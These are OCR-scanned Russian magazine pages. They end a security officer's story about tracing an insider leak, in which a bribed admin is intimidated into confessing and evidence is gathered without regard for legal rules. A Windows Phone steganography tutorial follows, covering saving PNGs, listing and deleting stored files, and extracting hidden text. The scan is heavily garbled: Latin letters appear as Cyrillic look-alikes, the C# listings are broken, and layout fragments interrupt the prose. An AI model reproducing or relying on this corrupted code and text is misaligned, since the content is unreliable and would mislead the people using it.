вается «сатори». Если мы не можем обратиться 
во внутренние органы напрямую, то кто мешает 
нам вспомнить старых знакомых? 

Была у нас в компании служба физической 
безопасности, попросту — охрана. И охранника- 
ми нашими командовал бывший оперуполномо- 
ченный МВД. Который со своей оперской сме- 
калкой давно заметил: что-то у нас происходит. 
И завел разговор с начальником отдела ИБ... 

Бывший опер задал нам тот вопрос, который 
мы должны были задать себе сразу, как только 
узнали о взломе. А именно: что могли злоумыш- 
ленники искать на наших серверах? И кому это 
могло быть выгодно? Но мы настолько уперлись 
в вопрос «как?», что совсем забыли о главном 
вопросе — «зачем?». Мы определяли важность 
той или иной информации, которая вращается 
у нас в компании, мы разрабатывали политики 
разграничения доступа, но, когда нас выбило 
из привычного ритма, мы сразу забыли все то, 
чему нас учили на курсах и семинарах, и стали 
отвечать на простые, но абсолютно не имеющие 
значения технические вопросы. 

А ответы были совсем близко — надо было 
понять, что искал злоумышленник. Сделать это 
оказалось просто — у нас был доступ ко всем 
сведениям о том, над чем сейчас работает ком- 
пания. А промотивированные начальники отде- 
лов рассказывали, что дают эти проекты и какая 
ожидается от них выгода. Уже «выстрелившие» 
проекты мы почти не рассматривали — вряд ли 



конкурентам интересно знать, как мы работа- 
ем, гораздо важнее для них было бы получить 
информацию о том, как мы планируем играть 
на предстоящих конкурсах и тендерах. Бизнес 
в России строится преимущественно на том, 
что компании делят сферы влияния, а то, что 
тендерная и конкурсная документация пишется 
под исполнителя, тоже ни для кого не секрет. 
Конкуренты, ведущие агрессивную политику 
и влезающие на уже поделенную территорию, 
были известны, также, благодаря личным 
знакомствам руководителей, мы знали, какими 
примерно ресурсами и кто располагает. Так что 
вычислить предполагаемого заказчика было 
не очень трудно. Дальше — просто. Посмотреть, 
кто из сейл-менеджеров и инженеров отвечает 
за самые крупные проекты, — вся информация 
доступна начальникам отделов. Социальные 
сети — это все-таки кладезь информации. Люди 
даже не стесняются указывать, что дружат, а то 
и состоят в родстве с сотрудниками компании- 
конкурента. 

Итак, у нас появился главный подозревае- 
мый, а остальное было делом техники. Сейлы 
вообще народ говорливый и умеют входить 
в доверие. Подружился наш продавай и с одним 
из админов. Узнали мы это весьма простым спо- 
собом: посмотрели записи видеокамер в курил- 
ке, с кем подозреваемый сейл чаще всего ходит 
курить. Естественно, тех, с кем ему по работе 
курить положено, мы не рассматривали. А вот 
админ — это уже интересно. Сейлы обычно с ад- 
минами не дружат. Корпоративной электронной 
почте эти ребята совершенно обоснованно 
не доверяли, да и личной, видимо, не очень. 

Как выяснилось позже, сработало еще 
и то, что админ уже был одной ногой на другой 
работе — в другой компании, из другой сферы, 
с которой мы никак не пересекались. При таком 




удачном раскладе админ не отказался от пред- 
ложения сейла. Предложение было подкреплено 
определенной суммой денег. От админа даже 
не требовалось делать ничего серьезного — 
необходимый софт ему передали, видимо, 
разработку заказывали на черном рынке или 
просто у какого-то не особо принципиального 
фрилансера. Как я уже говорил, ничего экс- 
траординарного малварь не умела, так что вряд 
ли за нее были отданы большие деньги. Всю эту 
информацию нам выдал сам админ. Как говорит- 
ся, на голубом глазу. Хорошо, что юридической 
подготовки у него не было никакой и удалось 
его припугнуть: на самом деле предъявить ему 
в суде было нечего — режим коммерческой тай- 
ны в компании введен не был и никаких фактов, 
даже просто подтверждающих утечку, на руках 
у нас не было. 

От кого исходила инициатива — от «нашего» 
сейла или от его родственника, мы выяснить 
не смогли. На самом деле — даже и не пыта- 
лись. Потому что не успели. Видимо, какая-то 
информация о наших действиях все-таки про- 
сочилась наружу. И сейл вдруг от нас уволил- 
ся. Как мы потом узнали — выдумал срочную 
причину, которую руководство сочло весомой, 
так что уволился он без отработок. В принципе, 
мы ничего, кроме увольнения, сделать с ним все 
равно бы не смогли — все наши доказательства 
были собраны с большим наплевательством 
на юридические нормы и правила сбора до- 
казательств, и в суде им бы грош была цена. 

Но его увольнение позволило нам добиться 
главного — мы поняли, куда конкретно метили 
конкуренты, и проект остался у нас. И мы смогли 
разобраться, как случилось заражение: новость 
о бегстве сейла сильно помогла расколоть адми- 
на — он понял, что остался тут один и всех собак 
повесят на него. Не скажу, что руководство было 
нами довольно, — под конец компанию трясло 
от наших действий, так что работать было трудно 
всем. Хорошо, что это продолжалось недолго. 

Вот так закончилась история со взломом. 
Довольно поучительно, как мне кажется, — если 
бы мы не уперлись в ретроспективный анализ, 
а сразу поняли суть проблемы, то закончилось 
бы все быстрее и не так болезненно. На самом 
деле, как именно произошел взлом, не так уж 
важно. По сути, это просто свершившийся факт. 
Проблема была в том, что мы не знали, что у нас 
утекло и кому это может быть выгодно — а имен- 
но это и важно для бизнеса. Так что, коллеги, 
не повторяйте наших ошибок и помните — 
мы работаем ради бизнеса. А не наоборот. ^ 




...СЛУЧИЛОСЬ то, что японцы НАЗЫВАЮТ 
^<САТОРИ^>. МЫ НЕ МОЖЕМ ОБРАТИТЬСЯ 
ВО ВНУТРЕННИЕ ОРГАНЫ, НО КТО МЕШАЕТ 
НАМ ВСПОМНИТЬ СТАРЫХ ЗНАКОМЫХ? 
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ШКОЛА НІ6НЮА0 — 
ЗАКЛЮЧИТЕЛЬНЫЙ УРОК 

Как это ни печально, но все когда- 
нибудь заканчивается — вот и мы 
заканчиваем наш цикл уроков 
по проектированию высоконагру- 
женных систем и надеемся, что тебе 
было так же интересно, как и нам. 

Но напоследок подытожим изучен- 
ный материал и добавим последнюю 
порцию полезных советов и теории. 
На этот раз речь пойдет о различных 
аспектах обслуживания работы про- 
ектов с высокой нагрузкой. Кроме 
того, в шестой урок вошло еще боль- 
ше реальных примеров от специали- 
стов, работающих над крупнейшими 
интернет-ресурсами Рунета. 
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готовим ПРИЛОЖЕНИЕ для АНОЯОІО 
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Заключительная часть эпопеи о раз- 
работке крутейшего ѴѴР7-приложения 


102 


Шесть рецептов, описанныхвэтой 
статье, пригодятся любому разработчику. 


116 



для скрытогохранения информации в изо- пишущему приложения для мобильной ОС 

Сражениях. Началосмотривноябрьском от«корпорации добра», 

номере илинадиске. 



БОЛЬШИЕ ГОНКИ 

Представляем сравнительный тест про- 
изводительности для всех популярных 
компиляторов. Удастсялинаэтотраз 
кому-нибудь оставить позади 6СС? 



ОЫІХОІО 



5УМ/АСК 





ИСКУССТВОСОПРЯЖЕНИЯ 

Сетевая природа СІМІХпозволяет делать 
множество интересныхвещей вдомаш- 
ней сети. Какты сможешьубедиться сам, 
расшарить удается любое устройство. 



сторожевой 7-ГОУРОВНЯ 

Вэтойстатье мы рассмотримсразуне- 
сколько популярных решений для филь- 
трации трафика динамических веб- 
приложений на прикладномуровне. 



ХИТРОСПЛЕТЕНИЕСВЯЗЕИ 

Нововведения в ѴѴіпсІоѵѵзОегѵег 201 2 
коснулисьсвятая святых корпора- 
тивной сети — службы доменовАс^іѵе 
Оігесііогу. Естьлитуткакой-то профит? 
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РАЗРАБАТЫВАЕМ СРЕДСТВА ДЛЯ СОХРАНЕНИЯ 
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_ л После этого мы наконец сможем в полной мере исполь- ^ 

XI %С зовать стеганографию в своих целях! I / 

9595173523992342351 



Продолжаем и завершаем разработку крутой ][-тулзы — 
стеганографа для ѴѴР, которую мы начали в прошлом 
номере. Нам осталось прикрутить к нашей софтине еще 
несколько фич: сохранение модифицированного изо- 
бражения и извлечение из него спрятанного сообщения. 
После этого мы наконец сможем в полной мере исполь- 
зовать стеганографию в своих целях! 









][-проект: стеганограф. Завершение І 



СОХРАНЕНИЕ ФОТОГРАФИИ 

В прошлой статье мы скрыли в фотографии текстовое сообще- 
ние и остановились перед задачей, как ее сохранить. На пер- 
вый взгляд — это и не задача совсем! На ум сразу же приходит 
решение: воспользоваться стандартными средствами опе- 
рационной системы ѴѴіпсІоѵѵз РЬопе, то есть в момент полу- 
чения потока данных фотографии вызвать метод ЗаѵеРісІиге 
(или ЗаѵеРісІигеТоСатегаРоІІ для сохранения фото в галерею 
камеры) объекта класса МесПаЫЬгагу. Этому методу передаются 
два параметра: имя файла для сохранения и собственно поток изо- 
бражения. В результате в альбом сохраненных фотографий и/или 
в галерею камеры будет помещена итоговая фотография... 

Правда, сохранена она будет в формате ^Р6. А из этого следует, 
что все скрытые нами текстовые данные будут утеряны из-за 
компрессии! Пиксели изменены — данные утеряны. В этом случае 
не спасет даже выставленное качество сохраняемого изображения 
в 100%. 

Оптимальный формат для сохранения изображения с моди- 
фицированными пикселями — это старый добрый ВМР. Чтобы 
сохранить сырой поток данных в этом формате, достаточно при- 
крутить к потоку заголовок, после чего можно просто напрямую 
сбросить получившийся «самородок» в флеш-память. Заманчиво, 
кажется просто, но все равно не вариант — ВМР не поддерживает- 
ся стандартными средствами системы У\ІР, а итоговый файл имеет 
чудовищные размеры из-за отсутствия сжатия. 

На помощь приходит формат РМ6. Сохраненные в нем изо- 
бражения имеют существенно меньший размер, чем в ВМР, но все 
же терпимо больше, чем в ^Р6. Это происходит потому, что РМ6 
использует алгоритм сжатия без потерь ОеЛаІе. Плюс к этому РМ6 
поддерживает канал прозрачности. К сожалению, формат РМ6 
тоже не поддерживается стандартными средствами ѴѴіпРЬопе. 

Чтобы решить сложившуюся проблему, я сначала попытал- 
ся воспользоваться расхваленной на СобеРІех библиотекой 
іппадеТооІз. По описанию, она включает впечатляющий набор 
кодеров/декодеров для сохранения/загрузки файлов в различные 
графические форматы. Как и ѴѴгіІеаЫеВіІтарЕх, рассматривае- 
мая либа предназначена в первую очередь для ЗіІѵегІідЫ и уже во 
вторую — для ѴѴіпРЬопе. Но если первая либа достаточно хорошо 
подогнана для ѴѴР, то о второй этого сказать нельзя. Перед тем 
как сохранить с помощью кодеров изображение, его надо со- 
хранить в расширенный контейнер для картинок — объект класса 
ЕхІепбесІІппаде, который содержится в ІтадеТооІз. И воттут нас 
поджидает трабла. После загрузки изображения в этот объект 
он все равно остается неинициализированным. Написав об этом 
разработчику, ничего интересного в ответ я не получил. Пришлось 
продолжить исследования. Найдя несколько решений, наиболее 
подходящим я счел ТооІЗіаск С# РМ6 ѴѴгіІег ЫЬгагу, расположен- 
ный по адресу 

Данное решение состоит из трех файлов: ТооіЗіаскСРСЫЬ.сз, 
ТооіЗіаскРМбѴѴгіІегЫЬ.сз и ТооІЗіаскРМбѴѴгіІегѴѴВехЕсз. Их можно 
взять из демонстрационного приложения, скачанного с сайта. Пер- 
вый по списку файл содержит класс СРС32, который предоставляет 
методы для вычисления контрольной суммы на основе результи- 
рующего РМб-файла. Второй содержащийся в этом файле класс 



ОТ РЕДАКЦИИ 



Даже если тебя не интересуеттема стеганографии и ты с подозрением 
относишься к ѴѴіпсІоѵѵз РИопе, я бы посоветовал все равно прочесть эту 
статью. Лично я не собирался кодить для ѴѴР, но из этой пары статей я 
узнал столько нового об этой системе и ее подводных камнях, что вре- 
мя на ее прочтение и редактирование я точно не считаю потерянным :). 



X АКЕ Р 



ОПТИМАЛЬНЫЙ ФОРМАТ 
ДЛЯ ИЗОБРАЖЕНИЯ 
С МОДИФИЦИРОВАННЫМИ 
ПИКСЕЛЯМИ — ЭТО ВМР. УВЫ, 
ѴІР7 ЕГО НЕ ПОДДЕРЖИВАЕТ 



Ас11ег32 включает методы для вычисления контрольной суммы * ’ 
запакованного компрессором 2 ІіЬ-архива. Тем не менее в текущей 
версии либы компрессия не поддерживается, результирующее 
изображение не получится запаковать, но нам в разрабатываемом’!^ ■ 
проекте это все равно не нужно, поскольку мы не хотим повредить Т 
скрытые данные. -' я 

Второй по списку файл — ТооІВіаскРМбѴѴгіІегЫЬ.сз содержит : 
классы для создания РМб-файла. Статичный класс РпдСЬипкТурез ■ 
описывает предопределенные заголовки для частей данных. 
Запечатанный класс РпдНеасІег содержит переменные, из ко- , 
торых формируется информация для заголовка файла: ширина, ’-.Щ 

высота изображения, цветовая глубина пикселя и так далее. ^ 

Основа либы — открытый класс РМбѴѴгіІег предоставляет методы іу 
для формирования и записи заголовка и изображения. ' I 

Третий файл списка содержит небольшое расширение для клас-Ѵ ! 
са ѴѴгіІеаЫеВіІтар, которое состоит из двух методов, позволяю- 4 

щих применить методы рассмотренного ранее класса РМбѴѴгіІег I 

для сохранения изображения в файловый поток в РМб. Неоспо- ч г] 
римое преимущество рассматриваемого решения — это возмож- I 

ность использовать его как с экземпляром стандартного класса 
ѴѴгіІеаЫеВіІтар, так и с расширенным — ѴѴгіІеаЫеВіІтарЕх (что мы Н 
уже и запланировали). ' - і 

Чтобы прибегнуть к перечисленным классам, достаточно ;» ■ 1 

скопировать эти три файла в каталог нашего решения и добавить - 
их в проект. Теперь можно свободно пользоваться дополнитель- 
ным функционалом. Перейди на следующую строчку после вызова ■ ^ 

функции НісІеТехІІпІтаде обработчика события 
туСапп_СарІигеІппадеАѵаіІаЫе и добавь следующий код: 



ѵаг І5о51;оге = І501а1:есІ51;ога§еРі1е.^ 
Се1;и5ег51:огеРогАрр1іса1;іоп() ; 

51:гіп§ бІеМаше = "рііоііо " + Се1:Кеа1Тіте( ) + ".рп§"; 
ѵаг рп§0е5І; = Бузііет. ІО. І501а1:есІ51;ога§е.4-' 
І501а1;есІ51;ога§еРі1е51;геат(б1еМате, ^ 

РіІеМосІе.СгеаІіе, ізоЗІіоге); 

ыЬ.1лІгі1;еРМб(рп§0е5І;) ; 

рп§0е5І:.Р1и5Іі(); 

рп§0е5І:.С1о5е(); 

ыЬ = пиіі; 

тезЗІігеат = пиіі; 

кеу51:геат = пиіі; 

В этом коде сначала получаем ссылку на объект хранили- 
ща данного приложения. Следующей строчкой кода формируем 
уникальное имя для файла, в котором сохраним изображение. 
Здесь используется самописная функция беіРеаІТіте, которая 
берет текущие дату и время, преобразует их в строку, заменяет 
в этой строке все символы «:» на символ «.» и возвращает итого- 
вую строчку. К началу этой строчки приставляется строка рЬоІо, 
а в конце — расширение рпд. Затем на основе объекта хранилища 
и полученного имени создается файловый поток для создания 
файла. После этого файл записывается с помощью функций добав- 
ленного расширения. Дальше поток сбрасывается, закрывается, 
а используемые объекты обнуляются. 















кодинг 







Билд готов для теста. Теперь после создания фото и скрытия 
текстового сообщения оно сохраняется в изолированное хранили- 
ще. Визуально ничего не изменилось, однако промежуток времени 
между нажатием на аппаратную кнопку фотозахвата и появлением 
отладочной надписи «Фото готово» заметно возрос. И это правиль- 
но, товарищи, — фото с разрешением 1600 на 1200 (установлено 
по умолчанию) имеет размер приблизительно 7 метров, и времени 
для его обработки и сохранения требуется больше — с учетом того 
что раньше сохранения не было вообще. К слову, опытным путем 
было установлено, что в данном случае в РМб можно сохранить 
изображение с разрешением максимум 2048 х 1536 пикселей. 

ВЫБОР ФАЙЛА ♦ 

К сожалению, у нас нет готового механизма для выбора файла 
из изолированного хранилища смартфона — проектировщиками 
системы не было предусмотрено что-то наподобие проводника 
‘ настольной ѴѴіпсІоѵѵз (а почему, почему это не было предусмотрено? 
Майкрософт, что ты сделал с прекрасной, самой совершенной, 
моей любимой ѴѴіпсІоѵѵз МоЬіІе 6.x? — Прим. ред.). 

Из приложения можно, воспользовавшись «выбирателем» 
ІСЬоозег) — объектом класса РЬоІоСЬоозегТазк, выбрать изобра- 
жение, но только из стандартных, предназначенных для хранения 
фотографий папок: «Сохраненные изображения», «Галерея каме- 
ры». От этого нам, как говорится, ни холодно ни жарко — содержи- 
,мое хранилища по-прежнему невидимо. Выявим его самостоятель- 
но. В файл МаіпРаде.хатІ.сз добавь следующую функцию: 



беІіРіІезО { 

ИзІіВохІ. Іііетз .С1еаг() ; 

ѵаг 5І;огеРі1е = Ізо1а1;есІ51:ога§еРі1е.<-' 

Се 1 ;и 5 ег 51 ;огеРогАрр 1 іса 1 :іоп( ) ; 

5І;гіп§ б1е51;гіп§ = 5уз1:етЛ0.Ра1:Іі.Се1;Рі1еМате("*") ; 
5І;гіп§[] біез = 5І:огеРі1е.Се1:Рі1еМате5("*") ; 

^ . ( і = 0 ; і < 5І;огеРі1е.Се1;Рі1еМате5("/" + <-■ 

б1е51:гіп§) . Іеп§1;Іі; і++) { 

51:гіп§ бІеМате = з1:огеРі1е.Се1;Рі1еМате5(б1е51:гіп§) [і] ; 
' 51:гіп§ ех1: = б1еМате.5иЬз1;гіп§(б1еМате. Іеп§1;Іі - 3); 

(ех1: == "рп§") 1І5І:Вох1Л1;ет5.АсІсІ(б1еМате); 

} 



} 






1 Приведенная функция выбирает файлы с расширением рпд 
^следующим образом. Сначала она очищает список, чтобы он не за- 
сорялся при переходе между страницами, а всегда заполнялся 
только существующими элементами. Следующим действием, 
по традиции, получаем объект изолированного хранилища. Затем 
определяем путь к файлам. Далее заполняем массив строк имена- 
■ ми всех файлов. Потом в цикле перебираем все файлы, определяя 
расширение каждого путем взятия подстроки, начинающейся 
с трех символов отточки и продолжая до ее конца. Если расшире- 
иние файла совпадает со строкой символов «рпд», в таком случае 
^этот файл — подготовленная нашей прогой фотография, тогда 
I добавляем имя этого файла в визуальный список — объект класса 
і ЫзіВох. 

Теперь во время активации данной страницы (со списком) не- 
обходимо выполнить вызов только что описанной функции: в конце 



П*ДЕ ПРОВОДНИК? МАЙКРОСОФТ, 






что ты СДЕЛАЛ С ПРЕКРАСНОЙ, 
САМОЙ СОВЕРШЕННОЙ, МОЕЙ 
ЛЮБИМОЙ ѴѴМ 6.x? 




Рис. 1. Создан один файл 



Рис. 2. Изображение успешно загружено 



обработчика ОпМаѵідаІесІТо добавь вызов — беіРіІезО;. Если сейчас 
запустить наше приложение (в том числе и на реальном смарте), то 
после ее загрузки в списке, находящемся внизу экрана, будет нахо- 
диться один элемент — имя файла — фотографии, сделанной тобой 
на предыдущем тесте, включая точное время снимка (рис. 1). 



ЗАГРУЗКА ИЗОБРАЖЕНИЯ 

Следующий шаг — загрузка сохраненной картинки и извлечение 
из нее скрытого сообщения. Первым делом следует увеличить 
размер шрифта в списке, чтобы было удобно выбирать элемент 
прикосновением. 

Для выбора изображения можно воспользоваться как минимум 
двумя событиями: ЗеІесбопСЬапдесІ и Тар объекта класса ЫзіВох. 
Первое из них происходит во время выбора пункта списка (при- 
косновением), а второе — в момент отпускания пальца. Воспользу- 
емся последним, в его обработчик напиши такой код: 

ІІ5І:ВохІ1;ет 5е1ес1:есІІ1;ет = . 1І5І:Вох1.ч-‘ 

І1;етСоп1;аіпегСепега1:ог.Соп1;аіпегРготІ1;ет( .4-< 
1І5І:Вох1.5е1ес1:есІІ1;ет) аз Ііз1:ВохІ1:ет; 

51:гіп§ бІеМате = зе1ес1;есІІ1:ет. Оа1;аСоп1;ех1; .То51:гіп§( ) ; 
ѵаг ізо51;оге = Ізо1а1;есІ51:ога§еРі1е..м 
Се1;и5ег51;огеРогАрр1іса1;іоп( ) ; 

Ві1;таріта§е зоигсе = Ві1:таріта§е(); 

(Ізо1а1;есІ51;ога§еРі1е51:геат б1е51:геат = ізо51;оге.4-‘ 
ОрепРі1е(б1еМате, РіІеМосІе.Ореп^ РіІеАссезз . КеасІ) ) { 
зоигсе . 5е1:5оигсе(б1е51;геат) ; 

зоигсе. Сгеа1;е0р1;іоп5 = Ві1;тарСгеа1:е0р1;іоп5 .Мопе; 

} 

іта§е1.5оигсе = зоигсе; 

В приведенном коде мы получаем выбранный в настоящий 
момент пункт списка. Затем получаем его контент — то есть текст. 
Традиционно нам нужен объект хранилища, далее создаем неви- 
зуальный контейнер для картинки и загружаем в него данные фай- 
лового потока. Этот поток создан на основе текстового контента 
пункта списка, который является именем файла. Так как открытие 
(в отличие от сохранения) РМб-файлов входит в стандартную функ- 
циональность ѴѴіпРЬопе, как мы убедились в этом выше, никаких 
дополнительных телодвижений не нужно. Последним действием 
покажем изображение в визуальном компоненте. Оп! Чтобы за- 
работал класс Віітарітаде, надо подключить соответствующее 
пр^транство имен: ЗузІепп.ѴѴіпсІоѵѵз.МесІіа.Іппадіпд; (рис. 2). 
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][-проект: стеганограф. ЗаверіЛ^н 



Меж тем список файлов довольно быстро растет, а хранилище 
активно заполняется. А значит — надо добавить возможность 
удаления файлов. Повесим эту задачу на обработчик события двой- 
' ного нажатия — ОоиЫеТар. Создай обработчик и после получения 
объекта класса из^ВохІІет и его имени (чтобы освежить воспоми- 
нания см. предыдущий листинг) напиши такую конструкцию: 

изіпе (ѵаг І 50 $ 1 :оге = І 501 а 1 ;есІ 51 ;ога§еРі 1 е.<м 
ее 1 ;и 5 ег 51 ;огеРогАрр 1 іса 1 ;іоп() ) { 

і-р (І 5 о 51 :оге. Рі 1 еЕхІ 5 Іі 5 (б 1 еМате) ) { 

1І5І;Вох1 . 11;ет5 . Кетоѵе(1І5І;Вох1 . 5е1ес1;есІІ1;ет) ; 
І5о51:оге.0е1е1:еРі1е(б1еМате) ; 

} 

} 



В результате выполнения этого кода из хранилища будет удален 
файл с именем, соответствующим пункту списка, а также сам этот 
пункт. Заметь: код в обработчиках событий заключен в конструк- 
ции Ігу/сакЬ (для экономии пространства в листингах не приведе- 
ны), это сделано для обработки исключения в результате выбора 
пустого пункта списка — прикосновения к пустому пространству. 



ВОССТАНОВЛЕНИЕ ИНФОРМАЦИИ 



Теперь, когда миниатюра изображения успешно загружена и ото- 
бражена в визуальном компоненте, необходимо извлечь из кар- 



тинки спрятанное при сохранении текстовое сообщение. Этим - 
займется функция ЕхІгасіТехіРготІтаде, которую нам предстоит 
написать. Поскольку она достаточно велика по объему, здесь мы 
приведем только краткий ее обзор, а функцию целиком ты можешь 
посмотреть на нашем диске. После того как текстура загружена 
в объект класса Віітарітаде (это происходит в обработчике*^офы- 
тия Тар), на его основе создается модифицируемая карта пиксе- . 
лей — объект класса ѴѴгіІеаЫеВіІтар. Затем создается пустой 
поток (объект класса МетогуЗігеат), в который будет записано из- 
влеченное текстовое сообщение. Далее создается поток для клю- 
ча. Этот поток возвращается функцией беіЗігеат, в качестве 
параметра принимающей текстовую константу, на основе которой 
создается поток байт. Подготовленные объекты передаются 
функции ЕхІгасіТехіРготІтаде, при этом пустой поток сообщения 
передается по ссылке, тогда как остальные — по значению. Пропу- 
стив инициализацию переменных функции ЕхІгасіТехіРготІппаде, 
видим считывание длины зашифрованного сообщения из первого 
пикселя изображения. Затем начинается цикл. В нем происходит 
обход определенных с помощью ключа пикселей битмапа и их ■ 
считывание. Извлечение схоже с операцией скрытия информации 
(см. прошлую статью), в том смысле, что вычисление расположе- 
ния следующего пикселя в изображении для записи/считывания 
осуществляется по одному алгоритму. После определения позиции 
текущего пикселя из него выбирается имеющий скрытую инфу 
байт — через выборку значения определенного цветового компо- 






ДОСТУП к СОДЕРЖИМОМУ ИЗОЛИРОВАННОГО ХРАНИЛИЩА 



ѴѴіпсІоѵѵз РИопе не предоставляет средств 
для отображения объектов, хранимых в флеш- 
памяти. С одной стороны — это логично, с хра- 
нилищем работают исключительно приложения, 
для каждого из которых выделяется опреде- 
ленная область памяти. Однако в процессе раз- 
работки порой приходится создавать большое 
число разнообразных объектов и появляется не- 
обходимость следить за содержимым хранили- 
ща — за созданными в нем объектами. Для этого 
в стандартный набор 50КѴѴР 7.1 входит утилита 
командной строки ІЗЕТооІ.ехе. Я не испытываю 
великой любви к командным строкам и счи- 
таю, что обозревать содержимое хранилища 
удобнее в графике. Поэтому пользуюсьутилитой 
ѴѴіпсІоѵѵз РЬопе 7 Ізоіаіесі Зіогаде Ехріогег, 
которую можно бесплатно скачать с сайта 
майкрософтовского опенсорса — СосІеРІех 
( ). После скачивания 

утебя появится М51-инсталлятор. В результа- 
те инсталляции в систему будет установлена 
оконная утилита. С чистого листа она не покажет 
содержимое хранилища, предварительно в при- 
ложение для смартфона нужно добавить под- 
держку утилиты. Для этого в Ѵ5 перейди в окно 
добавления ссылки (Рго]ес1 ^ АсІсІ Ре^егепсе) 
и уже в нем перейди на вкладку Вгоѵѵзе. Пере- 
йди в ту папку, куда ты установил рассматрива- 
емую утилиту, а далее — в подпапку ІіЬгагу (по 
умолчанию: с:\Ргодгат Рііез (х86)\ѴѴР7 Ізоіаіесі 
Зіогаде ЕхрІогег\ІіЬгагу\), оттуда выбери 
имеющуюся там сІіГку (ІзоІаІесІБіогадеЕхрІогег. 
сІІІ). Затем в своем приложении открой файл Арр. 
хаті.сз. В нем содержатся пустые обработчики 
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Рис. 3. Обзор содержимого хранилища 

событий, возникающих в процессе жизнедея- 
тельности приложения. Два из них нам нужно 
обработать. В моментзапуска приложения 
(событие АррІісаІіоп_ІаипсИіпд) необходимо 
открыть Эксплорер и вписать в обработчик 
такую строку: «ІзоІаІесІБіогадеЕхрІогег.ЕхрІогег. 
ЗіагіС'ІосаІИозІ");». ІосаІИозІ замени именем или 
ІР-адресом своего компа, на котором ты ведешь 
разработку. Второе событие, которое нам жела- 
тельно обработать, — это АррІісаІіоп_АсІіѵаІесІ, 
возникающее при активации приложения. 

Выжги в нем огненными буквами воттакую 
строчку: «ІзоІаІесІБіогадеЕхрІогег.ЕхрІогег. 
РезІогеРготТотЬзІопеО;». Теперь после запуска 
приложения можно посмотреть содержимое 
хранилища смартфона, н*а котором оно запу- 






щено. Для этого открой или саму утилиту ^Р'7 
Ізоіаіесі Біогаде Ехріогег из меню «Пуск», или 
дополнительное окно в студии: Ѵіеѵѵ ^ ОіИёг 
ѴѴіпсІоѵѵз ^ ѴѴР7 Ізоіаіесі Зіогаде Ехріогег. В обо- 






их случаях после загрузки в появившемся окн^ ^ 
должно отобразиться содержимое изолирован'.^ 
ного хранилища (рис. 3). С помощью конте^|^т- 
ного меню элементов содержимого окна'можно ; 
перекачать каждый из них с телефона на комп 
или удалить из хранилища. 

Р. 5. После того как ты отдебажишь свое 
приложение, не забудь удалить добавленные 
строки и заодно и приаттаченную либу, иначе 
ты рискуешь получить неработоспособное беЗ 
дебаггера приложение, которое будет падать 
сразу после запуска в свободной среде. 



ХАКІЁрТ2^7/22^^ . 



















к СОЖАЛЕНИЮ, В Ѵ\^ІМ00>Ѵ5 
РНОМЕ ПО УМОЛЧАНИЮ НЕТ 






ФУНКЦИИ СНЯТИЯ СКРИНШОТА 
ТЕКУЩЕГО ИЗОБРАЖЕНИЯ 
ЭКРАНА СА-ЛЯ РЯІНТ5СЯЕЕН) 



«.у 



нента, которое возвращается функцией СеіСоІогСотропепІ. Ей пе- 
,редаются цветтекущего пикселя и номер цветового компонента. 
Опираясь на его номер, она выбирает значение канала. Прежде 
чем присвоить это значение переменной І^оипсІВуІе, на него опера- 
цией исключающего «или» воздействует реверсивный байт ключа 
(его значение найдено ранее). После получения итогового байта он 
записывается в поток сообщения. Затем происходит смена номера 
цветового канала для применения на следующей итерации. 

По завершении цикла в переменной теззадеЗігеапп содер- 
жатся все байты, составляющие скрытое сообщение. Этот поток 
возвращается в обработчик события Тар, где преобразуется в юни- 
кодовую текстовую строку. Последняя, в свою очередь, выводится 
в текстовое поле. 

Обрати внимание: при смене страниц миниатюра фотки ис- 
чезает. Поэтому, подобно тому как мы делали с текстом (см. статью 
в прошлом номере), необходимо во время ухода со страницы 
с м^І+иатюрой сохранить ее в флеш-памяти, а при возврате на эту 
страницу — загрузить оттуда. Поскольку этот код похож на тот, 
что мы уже рассматривали и писали, приводить его в журнале 
я не буду, — как обычно, тебя ждет исходник проекта на диске. 







ЗАКЛЮЧЕНИЕ 

Вот и подошла к завершению разработка очередного приложе- 
ния для ѴѴіпсІоѵѵз РЬопе. На этот раз мы создали стеганографи- 
ческую тулзу, которая прячет текст в фотках твоего смартфона 
и так же легко ее оттуда извлекает. 



Основной функционал разработан, однако есть кое-что, 
что нам было бы желательно доработать. Так, мы не разработали 
механизм передачи созданного фотоматериала другому — уда- 
ленному пользователю. Сейчас это возможно только кружным 
путем — перекинуть фото на компьютер, воспользовавшись 
советом, приведенным во врезке, а уже потом сделать с ним все, 
что угодно. Что касается передачи напрямую со смартфона, то тут 
ѴѴР с удовольствием раскладывает подводные камни на на- 
шем фарватере. ѴѴіпРЬопе не предоставляет простых средств 
для передачи фотографии, например в качестве вложения 
в электронное письмо. И хотя последнее обновление операци- 
онной системы добавило возможность передачи ММ5 с файлами 
изображений, это можно сделать только с пользовательско- 
го уровня, а у программистов по-прежнему нет инструментов 
для реализации подобных действий из приложения. Будем на- 
деяться, что в следующей версии 50К этот фэйл (или фича, чтобы 
обеспечить безопасность? — Прим. ред. ;)) будет поправлен. 
Существует возможность отправки двоичного кода изображения 
в теле письма, но в этом случае на его размер накладываются 
жесткие ограничения. Оно не может быть больше 32 Кб (это чтобы 
ты. Юра, не протроянил смартфон очередной Скарлетт Йохансон 
и не переправил ее фотки в журнал «Хакер» :). — Прим. ред.). 

Для изображения в РМО это убийственное ограничение. 

Между тем есть облачное хранилище БкуОгіѵе. Можно туда 
залить нашу модифицированную фотку и расшарить ее с нашим 
удаленным дешифратором, чтобы он мог скачать ее. И этот вариант 
выглядит наиболее предпочтительным. Однако в данном случае 
появляются свои неприятности: стандартный АРІ для ѴѴіпсІоѵѵз 
РЬопе позволяет сохранять изображения только в формате ЗРб, 
который уничтожит все наши спрятанные в фотографию данные. 

К сожалению, реализация решения со БкуОгіѵе довольно объ- 
емна и требует отдельной статьи, но редактор сказал, что на двух 
статьях мы завершаем цикл (а на меня давит главред вообще- 
то. — Прим. ред.). Печально, но что поделаешь. В ближайшее 
время я постараюсь написать о БкуОгіѵе, но в другой теме. И тогда 
ты сможешь приделать решение к своему проекту РЬоІоМакег. 

Так что оставайся на связи! ; 



ЕЕШ 



«РЕШЕНИЕ ПРОБЛЕМЫ... СКРИНШОТОВ! 






, Когда текущий сеанс работы при- 



ложения не зависит от предыдущего, 
его жизненный процесс можно по- 
казать, делая скриншоты эмулятора. 

Но для нашего настоящего приложения 
этотвариант не подходит, поскольку, 
во-первых, необходимо его тестиро- 
вать на реальном девайсе, а во-вторых, 
нашаТірога создает контент, который 
^ надо сохранять между сеансами. По- 
{. э^ому.нужен способ снятия скриншота 
*^с'работающего на смартфоне прило- 
жени^К сожалению, в ѴѴіпсІоѵѵз РИопе 



